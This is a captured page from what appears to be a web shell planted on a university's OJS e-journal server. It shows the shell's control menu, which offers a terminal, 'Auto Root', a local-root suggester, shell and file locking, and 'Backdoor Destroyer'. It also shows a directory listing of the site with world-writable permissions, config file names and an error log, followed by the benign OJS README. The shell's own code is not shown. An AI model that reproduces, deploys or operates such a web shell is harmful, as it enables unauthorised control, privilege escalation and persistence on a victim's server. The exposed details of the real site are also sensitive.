Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
Server IP : & Your IP : 3.147.73.112
Domains :
Cant Read [ /etc/named.conf ]
User : elibrary.unsap.ac.id
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
D: /
localhost /
ejournal_unsap /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
api
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
cache
[ DIR ]
drwxrwxrwx
2024-06-05 20:37
cgi-bin
[ DIR ]
drwxrwxrwx
2021-10-28 15:36
classes
[ DIR ]
drwxrwxrwx
2023-06-07 23:30
controllers
[ DIR ]
drwxrwxrwx
2023-06-07 23:30
dbscripts
[ DIR ]
drwxrwxrwx
2023-06-07 23:30
docs
[ DIR ]
drwxrwxrwx
2024-09-12 18:45
dsa
[ DIR ]
drwxrwxrwx
2024-09-21 22:52
files
[ DIR ]
drwxrwxrwx
2024-01-19 14:04
js
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
lib
[ DIR ]
drwxrwxrwx
2024-08-21 20:14
locale
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
pages
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
plugins
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
registry
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
schemas
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
styles
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
templates
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
tools
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
.DS_Store
6
KB
-rw-rw-rw-
2022-06-27 11:25
.ftpquota
16
B
-rw-rw-rw-
2023-04-18 05:39
.htaccess
144
B
-rw-rw-rw-
2024-02-13 09:49
README.md
2.22
KB
-rw-rw-rw-
2022-06-27 11:25
cache.zip
2.61
MB
-rw-rw-rw-
2023-06-08 20:51
config.TEMPLATE.inc.php
16.27
KB
-rw-rw-rw-
2022-06-27 11:25
config.inc.php
16.38
KB
-rw-rw-rw-
2024-02-14 12:37
config_bua.inc.php
16.08
KB
-rw-rw-rw-
2022-06-25 16:35
cypress.json
734
B
-rw-rw-rw-
2022-06-27 11:25
error_log
180.72
MB
-rw-rw-rw-
2023-06-08 00:47
favicon.ico
1.12
KB
-rw-rw-rw-
2022-06-27 11:25
googlea1919ab817f4ec66.html
53
B
-rw-rw-rw-
2023-06-08 00:59
index.php
2.9
KB
-rw-rw-rw-
2022-06-27 11:25
robots.txt
32
B
-rw-rw-rw-
2022-06-27 11:25
web.config
993
B
-rw-rw-rw-
2023-06-09 00:45
Save
Rename
# Open Journal Systems > Open Journal Systems (OJS) has been developed by the Public Knowledge Project. For general information about OJS and other open research systems, visit the [PKP web site][pkp]. [](https://travis-ci.org/pkp/ojs) ## Documentation You will find detailed guides in [docs](docs) folder. ## Using Git development source Checkout submodules and copy default configuration : git submodule update --init --recursive cp config.TEMPLATE.inc.php config.inc.php Install or update dependencies via Composer (https://getcomposer.org/): composer --working-dir=lib/pkp install composer --working-dir=plugins/paymethod/paypal install composer --working-dir=plugins/generic/citationStyleLanguage install Install or update dependencies via [NPM](https://www.npmjs.com/): # install [nodejs](https://nodejs.org/en/) if you don't already have it npm install npm run build If your PHP version supports built-in development server : php -S localhost:8000 See the [Documentation Hub][doc-hub] for a more complete development guide. ## Running Tests We recommend using [Travis](https://travis-ci.org/) for continuous-integration based testing. Review the Travis configuration file (`.travis.yml`) as a reference for running the test locally, should you choose to do so. The tests include an integration test suite that builds a data environment from scratch, including the installation process. (This is the `-b` flag to the test script `lib/pkp/tools/runAllTests.sh`; this is also executed in the Travis environment.) ## Bugs / Issues See https://github.com/pkp/pkp-lib/#issues for information on reporting issues. ## License This software is released under the the [GNU General Public License][gpl-licence]. See the file [COPYING][gpl-licence] included with this distribution for the terms of this license. Third parties are welcome to modify and redistribute OJS in entirety or parts according to the terms of this license. PKP also welcomes patches for improvements or bug fixes to the software. [pkp]: https://pkp.sfu.ca/ [readme]: docs/README.md [doc-hub]: https://docs.pkp.sfu.ca/ [php-unit]: https://phpunit.de/ [gpl-licence]: docs/COPYING